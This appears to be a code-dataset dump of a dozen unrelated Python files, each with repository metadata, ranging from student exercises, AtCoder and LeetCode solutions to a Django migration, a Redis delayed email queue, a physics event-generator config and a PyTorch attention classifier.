|
eb1b31d2b5274617cd7fd88602938f3541556159
|
[] |
no_license
|
felipellima83/UniCEUB
|
05991d7a02b13cd4e236f3be3a34726af2dc1504
|
dbc44866545b5247d1b5f76ec6e9b7778e54093e
|
refs/heads/master
| 2023-07-08T19:04:19.830473
| 2021-08-12T12:33:49
| 2021-08-12T12:33:49
| 249,958,282
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 274
|
py
|
#Professor: Antônio Barbosa Junior
#Disciplina: Lógica de programação
#Aluno: Felipe Ferreira Lima e Lima
#Matrícula: 22001310
#Data: 08/04/2020
#Exercício 06
# Print the numbers 7 down to 0 on a single line, separated by spaces.
# (The original initialized `soma = 0` and `i = 0` but never used either —
# removed as dead code.)
lista = range(7, -1, -1)
# ou lista = [7,6,5,4,3,2,1,0]
for x in lista:
    print(x, end=" ")
|
[
"felipellima83@gmail.com"
] |
felipellima83@gmail.com
|
38c43c83964024b74479add7f0bcda934ea9529c
|
6aa3c372bd2b058be406955768b3fc2047b580e6
|
/modules/datastructures/TrainData_DelphesDomAda.py
|
fdfbc32b890f974127958ad46519ae415b4a7411
|
[] |
no_license
|
mverzett/DeepJet-1
|
b1aa1491bba284adfa78208237c48ef37fbe4ab3
|
04efbac1a6e4bef97a7ca1bc64345cc048f7ce20
|
refs/heads/master
| 2021-03-30T15:35:20.059508
| 2018-02-20T17:28:07
| 2018-02-20T17:28:07
| 120,431,339
| 0
| 0
| null | 2018-02-06T09:25:49
| 2018-02-06T09:25:49
| null |
UTF-8
|
Python
| false
| false
| 1,988
|
py
|
'''
Created on 21 Feb 2017
@author: jkiesele
'''
from TrainDataDeepJetDelphes import TrainDataDeepJetDelphes, fileTimeOut
class TrainData_DelphesDomAda(TrainDataDeepJetDelphes):
    '''
    example data structure - basis for further developments

    Domain-adaptation variant: in addition to the flavour-classification
    inputs it registers the `isMC`/`isTtbar` branches so training can use a
    data-vs-MC domain label alongside the flavour truth.
    '''

    def __init__(self):
        '''
        Constructor
        '''
        TrainDataDeepJetDelphes.__init__(self)
        self.addBranches(['jet_pt', 'jet_eta']) #consider jet pt and eta
        self.addBranches(['track_pt'], 6) #consider the pt of the first 6 tracks
        self.addBranches(['track_releta', 'track_sip3D', 'track_sip2D'], 10) #all those for the first 10 tracks
        self.registerBranches(['isMC','isTtbar'])
        #creates label weights per batch
        #due to normalisation, two are sufficient for 3 labels (B, C UDSG)
        #self.generatePerBatch=None #[[0.2,5.],[0.2,5.]]

    def readFromRootFile(self,filename,TupleMeanStd, weighter):
        # Read the ROOT tuple and assemble the weight/input/truth arrays:
        # flavour-classification inputs plus a data-vs-MC domain label.
        import numpy
        Tuple = self.readTreeFromRootToTuple(filename)
        # Reshape the per-jet flags into [n, 1] column vectors for hstack.
        mclabel=Tuple['isMC'].view(numpy.ndarray)
        mclabel=mclabel.reshape(mclabel.shape[0],1)
        proclabel=Tuple['isTtbar'].view(numpy.ndarray)
        proclabel=proclabel.reshape(mclabel.shape[0],1)
        weights,x_all,alltruth, notremoves =self.getFlavourClassificationData(filename,TupleMeanStd, weighter)
        if self.remove:
            #print('remove')
            # Keep only the entries the weighter did not flag for removal.
            mclabel=mclabel[notremoves > 0]
            proclabel=proclabel[notremoves > 0]
        # Domain truth = [isMC | flavour truth] concatenated per jet.
        domaintruth_datamc=numpy.hstack((mclabel,alltruth))
        labeltruth=domaintruth_datamc
        #domaintruth_ttbarqcd=numpy.hstack((proclabel,alltruth))
        self.w=[weights]
        #the label fraction weights are computed on the fly
        self.x=[x_all, alltruth]
        #the truth
        self.y=[labeltruth,domaintruth_datamc]
|
[
"jkiesele@cern.ch"
] |
jkiesele@cern.ch
|
f3acdac3cec7c99140af2bf68d17ebb3f6c47ebd
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03112/s044499237.py
|
d133af3812b23eda812e0e4e272d7974e8c817c9
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,289
|
py
|
# なぜかうまくいかない
import sys, re, os
from collections import deque, defaultdict, Counter
from math import ceil, sqrt, hypot, factorial, pi, sin, cos, radians
from itertools import permutations, combinations, product, accumulate
from operator import itemgetter, mul
from copy import deepcopy
from string import ascii_lowercase, ascii_uppercase, digits
from fractions import gcd
from bisect import bisect, bisect_right, bisect_left
# Fast-input helpers: read whole lines from sys.stdin and parse them.
def input(): return sys.stdin.readline().strip()
def INT(): return int(input())
def MAP(): return map(int, input().split())
def S_MAP(): return map(str, input().split())
def LIST(): return list(map(int, input().split()))
def S_LIST(): return list(map(str, input().split()))
sys.setrecursionlimit(10 ** 9)
INF = float('inf')
mod = 10 ** 9 + 7
# p03112: A shrine positions (S), B temple positions (T), Q query points (X).
# For each query, output the minimum total walking distance needed to visit
# at least one shrine and one temple, starting from x.
A, B, Q = MAP()
S = [INT() for i in range(A)]
T = [INT() for i in range(B)]
X = [INT() for i in range(Q)]
# Infinite sentinels at both ends so bisect always has a neighbor on each side.
S.insert(0, -INF)
S.append(INF)
T.insert(0, -INF)
T.append(INF)
for x in X:
    # Indices of the first shrine/temple strictly to the right of x.
    s = bisect(S, x)
    t = bisect(T, x)
    # print(s, t)
    # a = min(x - S[s-1], S[s] - x)
    # b = min(x - T[t-1], T[t] - x)
    res = INF
    # Try the nearest shrine (a) and temple (b) on each side; for each pair,
    # either go shrine-first then temple, or temple-first then shrine.
    for a in [S[s-1], S[s]]:
        for b in [T[t-1], T[t]]:
            res = min(res, min(abs(a - x) + abs(b - a), abs(x - b) + abs(b - a)))
    print(res)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
41cc2e1bdbdc341bf991d5e4a6e225b13acba6cb
|
6710c52d04e17facbc9fb35a7df313f7a2a7bd53
|
/0234. Palindrome Linked List.py
|
38f97dc46d5f45578be5aaebb55f90e98ad5532b
|
[] |
no_license
|
pwang867/LeetCode-Solutions-Python
|
535088fbe747a453360457728cc22cf336020bd2
|
188befbfb7080ba1053ee1f7187b177b64cf42d2
|
refs/heads/master
| 2022-11-13T16:20:28.211707
| 2020-06-28T06:01:14
| 2020-06-28T06:01:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,333
|
py
|
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
# time O(n), space O(1) in place
class Solution(object):
    """Decide whether a singly linked list is a palindrome.

    Reverses the front half in place while a fast pointer locates the middle,
    then compares the reversed front half with the back half.
    O(n) time, O(1) extra space; note the front half is left reversed.
    """

    def isPalindrome(self, head):
        """
        :type head: ListNode
        :rtype: bool
        """
        # Zero or one node is trivially a palindrome.
        if head is None or head.next is None:
            return True
        prev = None
        slow = head
        fast = head.next
        # Each step: advance `fast` by two while reversing the link behind
        # `slow`.  When `fast` runs out, `prev` heads the reversed front
        # half and `slow` sits at (or just before) the middle.
        while fast is not None and fast.next is not None:
            fast = fast.next.next
            nxt = slow.next
            slow.next = prev
            prev, slow = slow, nxt
        if fast is not None:
            # Even length: `slow` and `slow.next` are the middle pair and
            # must match before comparing the outer halves.
            if slow.val != slow.next.val:
                return False
            return self.isSameList(prev, slow.next.next)
        # Odd length: the single middle node is skipped.
        return self.isSameList(prev, slow.next)

    def isSameList(self, head1, head2):
        """Return True iff both lists have the same length and equal values."""
        while head1 is not None and head2 is not None:
            if head1.val != head2.val:
                return False
            head1, head2 = head1.next, head2.next
        # Both lists must be exhausted together.
        return head1 is None and head2 is None
"""
Given a singly linked list, determine if it is a palindrome.
Example 1:
Input: 1->2
Output: false
Example 2:
Input: 1->2->2->1
Output: true
Follow up:
Could you do it in O(n) time and O(1) space?
"""
|
[
"wzhou007@ucr.edu"
] |
wzhou007@ucr.edu
|
029c81b549e9282b6f68c0739e2079610361cce5
|
72246a70e272dfc279b1b4945c232f16900bb963
|
/To_write_in_the_txt_file.py
|
8ea3d0ff35b684318fb43fac57e91870fad16a2e
|
[] |
no_license
|
stheartsachu/Python_basics_and_data_base_operations
|
bb15f4b06e404b8c3456061478e1a86fcb541fed
|
6441eb247336cf5a0e935efc43f48d12aa32affe
|
refs/heads/master
| 2020-06-25T09:09:59.021325
| 2019-07-28T09:35:07
| 2019-07-28T09:35:07
| 199,268,012
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 436
|
py
|
# Let us simplify the code
# by using the "with" Keyword.
# write to a text file
# The context manager closes the file automatically when the block exits,
# so the explicit f.close() the original called inside the `with` block was
# redundant (it even contradicted the comment below) — removed.
with open('t.txt', 'w') as f:
    f.write('HEllo World ! ')
# It will be Closed automaticallly
# f = open('t.txt', mode = 'w')
# w = create and write
# r = read(default)
# a = append
# x = create if not exist
# with = with satement is used tp wrap the execution of a block of code
# within methods defined by a context manger
|
[
"seartsachu@gmail.com"
] |
seartsachu@gmail.com
|
9468f8e04cd8b22575a8e8a5cb5f2154b120d75d
|
be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1
|
/Gauss_v45r10p1/Gen/DecFiles/options/12315011.py
|
1eaf65a06d4accb4b62d4c0891406e399fbd51c4
|
[] |
no_license
|
Sally27/backup_cmtuser_full
|
34782102ed23c6335c48650a6eaa901137355d00
|
8924bebb935b96d438ce85b384cfc132d9af90f6
|
refs/heads/master
| 2020-05-21T09:27:04.370765
| 2018-12-12T14:41:07
| 2018-12-12T14:41:07
| 185,989,173
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,789
|
py
|
# file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/12315011.py generated: Wed, 25 Jan 2017 15:25:15
#
# Event Type: 12315011
#
# ASCII decay Descriptor: {[B+ -> K+ pi+ pi- e+ mu-]cc,[B+ -> K+ pi+ pi- e- mu+]cc}
#
# Gauss/Gaudi generator configuration for event type 12315011:
# B+ -> K+ pi+ pi- e mu signal production via repeated hadronization.
from Configurables import Generation
Generation().EventType = 12315011
Generation().SampleGenerationTool = "SignalRepeatedHadronization"
from Configurables import SignalRepeatedHadronization
Generation().addTool( SignalRepeatedHadronization )
Generation().SignalRepeatedHadronization.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
# Decay file describing the signal decay chain and generator-level cuts.
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bu_Kpipiemu=DecProdCut.dec"
Generation().SignalRepeatedHadronization.CutTool = "DaughtersInLHCb"
# Signal PID: B+ / B- (521 / -521).
Generation().SignalRepeatedHadronization.SignalPIDList = [ 521,-521 ]
# Ad-hoc particle gun code
# Alternative production path: shoot B+ mesons from a particle gun whose
# momentum is sampled from a pre-recorded pt-eta spectrum.
from Configurables import ParticleGun
pgun = ParticleGun("ParticleGun")
pgun.SignalPdgCode = 521
pgun.DecayTool = "EvtGenDecay"
pgun.GenCutTool = "DaughtersInLHCb"
from Configurables import FlatNParticles
pgun.NumberOfParticlesTool = "FlatNParticles"
pgun.addTool( FlatNParticles , name = "FlatNParticles" )
from Configurables import MomentumSpectrum
pgun.ParticleGunTool = "MomentumSpectrum"
pgun.addTool( MomentumSpectrum , name = "MomentumSpectrum" )
pgun.MomentumSpectrum.PdgCodes = [ 521,-521 ]
pgun.MomentumSpectrum.InputFile = "$PGUNSDATAROOT/data/Ebeam4000GeV/MomentumSpectrum_521.root"
pgun.MomentumSpectrum.BinningVariables = "pteta"
pgun.MomentumSpectrum.HistogramPath = "h_pteta"
from Configurables import BeamSpotSmearVertex
# Smear the production vertex according to the beam-spot profile.
pgun.addTool(BeamSpotSmearVertex, name="BeamSpotSmearVertex")
pgun.VertexSmearingTool = "BeamSpotSmearVertex"
pgun.EventType = 12315011
|
[
"slavomirastefkova@b2pcx39016.desy.de"
] |
slavomirastefkova@b2pcx39016.desy.de
|
158692323da657d0cf8086a5b00d0b90d3d7c5a8
|
bd4812ba7af196d2e866cbf2935b2e7308d95066
|
/python/leetcode/024_swap_nodes_in_pairs.py
|
d79edba96ef1dc07ede242c6bafa8a371bfe4052
|
[
"Apache-2.0"
] |
permissive
|
yxun/notebook
|
f507201e15c4376f0655121724254c0d5275c3b1
|
00eb1953d872a9a93a13d7cf23d8e4ed641d1ce7
|
refs/heads/master
| 2023-09-01T03:50:48.142295
| 2023-08-17T12:11:25
| 2023-08-17T12:11:25
| 207,569,654
| 2
| 2
|
Apache-2.0
| 2023-08-17T12:11:26
| 2019-09-10T13:38:49
|
Java
|
UTF-8
|
Python
| false
| false
| 1,334
|
py
|
#%%
"""
- Swap Nodes in Pairs
- https://leetcode.com/problems/swap-nodes-in-pairs/
- Medium
Given a linked list, swap every two adjacent nodes and return its head.
You may not modify the values in the list's nodes, only nodes itself may be changed.
Example:
Given 1->2->3->4, you should return the list as 2->1->4->3.
"""
#%%
class ListNode:
    # Singly-linked list node: `data` holds the payload, `next` points to the
    # following node (None terminates the list).
    def __init__(self, data=0, next=None):
        self.data = data
        self.next = next
#%%
class S1:
    """Recursive solution: detach the first pair, swap it, and recurse on
    the remainder of the list."""

    def swapPairs(self, head):
        """
        :type head: ListNode
        :rtype: ListNode
        """
        # Fewer than two nodes left — nothing to swap.
        if head is None or head.next is None:
            return head
        second = head.next
        # Swap everything after this pair first, then splice the current
        # pair back in reversed order.
        head.next = self.swapPairs(second.next)
        second.next = head
        return second
#%%
class S2:
    """Iterative solution: a dummy head node removes the special case for
    swapping the real head pair."""

    def swapPairs(self, head):
        """
        :type head: ListNode
        :rtype: ListNode
        """
        # Fewer than two nodes — nothing to swap.
        if head is None or head.next is None:
            return head
        sentinel = ListNode(-1)
        sentinel.next = head
        tail = sentinel
        # While a full pair remains, rewire tail -> second -> first -> rest.
        while tail.next is not None and tail.next.next is not None:
            first = tail.next
            second = first.next
            rest = second.next
            tail.next = second
            second.next = first
            first.next = rest
            tail = first
        return sentinel.next
|
[
"yuanlin.yxu@gmail.com"
] |
yuanlin.yxu@gmail.com
|
11887d383e22055fe0ed0193394c2562e3d244b0
|
48934047ac284e2a9a745f00b5ec84b3d72382bf
|
/nyasha/blog/migrations/0005_auto__add_tag.py
|
e8afe3b0236239eb264ac782548a67fad230695b
|
[
"WTFPL"
] |
permissive
|
Apkawa/nyasha
|
e36f4281c33eb6135320391349e2dadee3c01666
|
0d126e93be273ba73b005a793340501377485c3e
|
refs/heads/master
| 2020-04-28T20:53:47.312077
| 2012-06-12T21:49:20
| 2012-06-12T21:49:20
| 1,100,616
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,518
|
py
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: add the `Tag` model and the `Post.tags`
    many-to-many join table (with a uniqueness constraint on the pair)."""

    def forwards(self, orm):
        # Adding model 'Tag'
        db.create_table('blog_tag', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('name', self.gf('django.db.models.fields.CharField')(max_length=42)),
        ))
        db.send_create_signal('blog', ['Tag'])

        # Adding M2M table for field tags on 'Post'
        db.create_table('blog_post_tags', (
            ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
            ('post', models.ForeignKey(orm['blog.post'], null=False)),
            ('tag', models.ForeignKey(orm['blog.tag'], null=False))
        ))
        # Each (post, tag) pair may appear only once.
        db.create_unique('blog_post_tags', ['post_id', 'tag_id'])

    def backwards(self, orm):
        # Deleting model 'Tag'
        db.delete_table('blog_tag')

        # Removing M2M table for field tags on 'Post'
        db.delete_table('blog_post_tags')

    # Frozen ORM snapshot South uses to build `orm` for this migration —
    # auto-generated; do not edit by hand.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'blog.comment': {
            'Meta': {'unique_together': "(('post', 'number'),)", 'object_name': 'Comment'},
            'body': ('django.db.models.fields.TextField', [], {}),
            'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'from_client': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'number': ('django.db.models.fields.IntegerField', [], {}),
            'post': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'comments'", 'to': "orm['blog.Post']"}),
            'reply_to': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['blog.Comment']", 'null': 'True', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        },
        'blog.post': {
            'Meta': {'unique_together': "(('id', 'user'),)", 'object_name': 'Post'},
            'body': ('django.db.models.fields.TextField', [], {}),
            'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'from_client': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['blog.Tag']", 'symmetrical': 'False'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        },
        'blog.recommend': {
            'Meta': {'unique_together': "(('post', 'user'),)", 'object_name': 'Recommend'},
            'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'post': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['blog.Post']"}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'recommends_user'", 'to': "orm['auth.User']"})
        },
        'blog.subscribed': {
            'Meta': {'unique_together': "(('user', 'subscribe_user'),)", 'object_name': 'Subscribed'},
            'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'subscribe_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'subscribed'", 'to': "orm['auth.User']"}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'me_subscribe'", 'to': "orm['auth.User']"})
        },
        'blog.tag': {
            'Meta': {'object_name': 'Tag'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '42'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        }
    }

    complete_apps = ['blog']
|
[
"apkawa@gmail.com"
] |
apkawa@gmail.com
|
85dcc5969e56bb08a2daeb27e23d432d34c58286
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02718/s147463629.py
|
e093f018cdb275a578db1fcc576e49cebc099eb6
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 166
|
py
|
# 161 B
# A candidate's votes count only if they are at least 1/(4M) of the total;
# answer Yes when the M-th most-voted candidate clears that threshold.
N, M = map(int, input().split())
A = list(map(int, input().split()))
A.sort(reverse=True)
threshold = sum(A) / (4 * M)
print('Yes' if A[M - 1] >= threshold else 'No')
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
1ebc38c9e5488846563e087b28f5172fb47bfd2c
|
fce15571b2b65769758d4885deb4365153672a47
|
/task_queue/redis_impl.py
|
280a7be2d96fe3b835fdcdecc0303fe4016e773c
|
[
"MIT"
] |
permissive
|
xlui/eFuture
|
239f66c698390af9d4c5b82b32eed81e36c177e8
|
9bb9e8faca561ca5ccfb16de5401b6acd2ec692d
|
refs/heads/py
| 2021-06-02T23:52:08.224564
| 2019-08-24T04:57:24
| 2019-08-24T04:57:24
| 149,577,756
| 0
| 0
|
MIT
| 2021-03-20T00:10:07
| 2018-09-20T08:35:32
|
Python
|
UTF-8
|
Python
| false
| false
| 1,624
|
py
|
import datetime
import uuid
from log import logger
from task_queue import connection, QUEUE_KEY
def push(message: str, date: datetime.datetime):
    """Push a message into redis zset

    :param message: message content
    :param date: the date this message to be consumed
    :return: None
    """
    # A random UUID keys the message body; the zset scores that id by the
    # due timestamp so the earliest-due message always sorts first.  Both
    # writes go through one pipeline so they are sent together.
    msg_id = str(uuid.uuid4())
    pipeline = connection.pipeline()
    pipeline.set(msg_id, message)
    pipeline.zadd(QUEUE_KEY, {
        msg_id: date.timestamp()
    })
    pipeline.execute()
    logger.info(f'Save a new future email: [message: {message}, date: {date}]')
def pop():
    """Check the first task in redis(which is the task with the smallest score)
    if the score(timestamp) is smaller or equal to current timestamp, the task
    should be take out and done.

    :return: (bool, str) — True plus the message if a task was taken out,
        False plus an explanation otherwise.
    """
    # zrange(0, 0) returns the entry with the smallest score, i.e. the
    # earliest-due message.
    task = connection.zrange(QUEUE_KEY, 0, 0)
    if not task:
        return False, 'No emails now!'
    msg_id = task[0]
    timestamp = connection.zscore(QUEUE_KEY, msg_id)
    now = datetime.datetime.now().timestamp()
    # Due when its timestamp is in the past or within 1 µs of now (the
    # epsilon guards against float comparison noise).
    if timestamp < now or abs(timestamp - now) <= 1e-6:
        message = connection.get(msg_id)
        # Remove both the zset entry and the message body atomically.
        pipeline = connection.pipeline()
        pipeline.zrem(QUEUE_KEY, msg_id)
        pipeline.delete(msg_id)
        pipeline.execute()
        return True, message
    return False, "It's too early now!"
if __name__ == '__main__':
    # Smoke test: schedule a message 10 s in the future, then busy-poll the
    # queue until it becomes due and is consumed (loop never exits).
    now = datetime.datetime.now()
    logger.debug('push hello')
    push('hello', now + datetime.timedelta(seconds=10))
    while True:
        b, m = pop()
        if b:
            logger.debug(m)
|
[
"liuqi0315@gmail.com"
] |
liuqi0315@gmail.com
|
cbbfba9bdb63e74a1c7c05035f325aa7f0d7af7e
|
c49e35bc834c259cc0d7ab2165dbd48e12f6d1b6
|
/model/word_attn_classifier.py
|
c5ac2ca9a9d5b3b24f2e003883f3afb2027270a6
|
[
"MIT"
] |
permissive
|
kenchan0226/dual_view_review_sum
|
f18997bce101ee3ac70d96813d75c6cb29ac921c
|
2ff1c7323b98f0a8ca1dfb0341806e05b87faf52
|
refs/heads/master
| 2023-03-02T10:00:26.315254
| 2021-02-03T02:13:27
| 2021-02-03T02:13:27
| 266,673,121
| 19
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,184
|
py
|
import torch
import torch.nn as nn
from torch.nn import init
from model.attention import Attention
class WordAttnClassifier(nn.Module):
    """Attention-pooled sequence classifier.

    A learned query vector attends over the word-level encoder memory bank to
    build a context vector, which a small MLP maps to class scores.  With
    `hr_enc=True` a second learned query attends over a sentence-level memory
    bank and the two context vectors are concatenated before classification.
    """

    def __init__(self, query_hidden_size, memory_bank_size, num_classes, attn_mode, dropout=0.0, ordinal=False, hr_enc=False):
        super(WordAttnClassifier, self).__init__()
        self.memory_bank_size = memory_bank_size
        self.query_hidden_size = query_hidden_size
        self.num_classes = num_classes
        self.hr_enc = hr_enc
        # for word level memory bank
        # Learned query, initialised uniformly in [-0.1, 0.1].
        self._query_vector = nn.Parameter(torch.zeros(1, query_hidden_size))
        init.uniform_(self._query_vector, -0.1, 0.1)
        self.attention_layer = Attention(query_hidden_size, memory_bank_size, coverage_attn=False, attn_mode=attn_mode)
        # for sent level memory bank
        if self.hr_enc:
            self._sent_query_vector = nn.Parameter(torch.zeros(1, query_hidden_size))
            init.uniform_(self._sent_query_vector, -0.1, 0.1)
            self.sent_attention_layer = Attention(query_hidden_size, memory_bank_size, coverage_attn=False, attn_mode=attn_mode)
        self.ordinal = ordinal
        # Context size doubles when sentence-level attention is concatenated.
        self.expanded_memory_size = memory_bank_size if not hr_enc else 2 * memory_bank_size
        if ordinal:
            # Ordinal mode: independent sigmoid per class.
            self.classifier = nn.Sequential(nn.Linear(self.expanded_memory_size, self.expanded_memory_size),
                                            nn.Dropout(p=dropout),
                                            nn.ReLU(),
                                            nn.Linear(self.expanded_memory_size, num_classes),
                                            nn.Sigmoid())
        else:
            # Categorical mode: log-probabilities over classes.
            self.classifier = nn.Sequential(nn.Linear(self.expanded_memory_size, self.expanded_memory_size),
                                            nn.Dropout(p=dropout),
                                            nn.ReLU(),
                                            nn.Linear(self.expanded_memory_size, num_classes),
                                            nn.LogSoftmax(dim=1))

    def forward(self, encoder_memory_bank, src_mask, sent_memory_bank=None, sent_mask=None):
        """
        :param encoder_hidden_states: [batch, src_len, memory_bank_size]
        :param sent_memory_bank: [batch, sent_num, memory_bank_size]
        :return: (logit, (word_attn_dist, sent_attn_dist_or_None))
        """
        batch_size = encoder_memory_bank.size(0)
        # Broadcast the single learned query across the batch.
        query_vector_expanded = self._query_vector.expand(batch_size, self.query_hidden_size)  # [batch, query_hidden_size]
        context, attn_dist, _ = self.attention_layer(query_vector_expanded, encoder_memory_bank, src_mask)
        attn_dist_tuple = (attn_dist, None)
        if self.hr_enc:
            sent_query_vector_expanded = self._sent_query_vector.expand(batch_size, self.query_hidden_size)  # [batch, query_hidden_size]
            sent_context, sent_attn_dist, _ = self.sent_attention_layer(sent_query_vector_expanded, sent_memory_bank, sent_mask)
            # [batch, 2 * memory_bank_size]
            context = torch.cat([context, sent_context], dim=1)
            attn_dist_tuple = (attn_dist, sent_attn_dist)
        logit = self.classifier(context)
        return logit, attn_dist_tuple
|
[
"kenchanhp@gmail.com"
] |
kenchanhp@gmail.com
|
257d9c5993e931be92ff8bd92ceacd54ed6c9727
|
3869cbd5ee40e2bab5ca08b80b48115a7b4c1d5a
|
/Python-3/basic_examples/strings/string_expandtabs.py
|
c31cbcf03990c262555129f083b6bf6e26bbd25b
|
[
"MIT"
] |
permissive
|
Tecmax/journaldev
|
0774c441078816f22edfd68286621493dd271803
|
322caa8e88d98cfe7c71393bcd2a67cf77368884
|
refs/heads/master
| 2020-07-08T04:05:03.028015
| 2019-08-12T09:17:48
| 2019-08-12T09:17:48
| 203,559,030
| 0
| 1
|
MIT
| 2019-08-21T10:13:47
| 2019-08-21T10:13:47
| null |
UTF-8
|
Python
| false
| false
| 559
|
py
|
# Demonstrate str.expandtabs() with the default and explicit tab sizes.

s = 'A\tB\tC\tD'
print(s)
print(s.expandtabs())

s = 'ABCD\tE\tF'
print(s)
print(s.expandtabs())

s = 'ABCDEFGHIJK\tG'
print(s.expandtabs())

s = 'ABCDEFGHIJK\t\tG'
print(s.expandtabs())

s = 'ABC\tD'
print(s)
print(s.expandtabs())

# Sweep tab sizes 0 through 7 for the same sample string.
for width in range(8):
    print(s.expandtabs(tabsize=width))

s = 'ABC\tD'
# Negative tab sizes behave like tabsize=0: tabs are simply removed.
print(s.expandtabs(tabsize=-1))
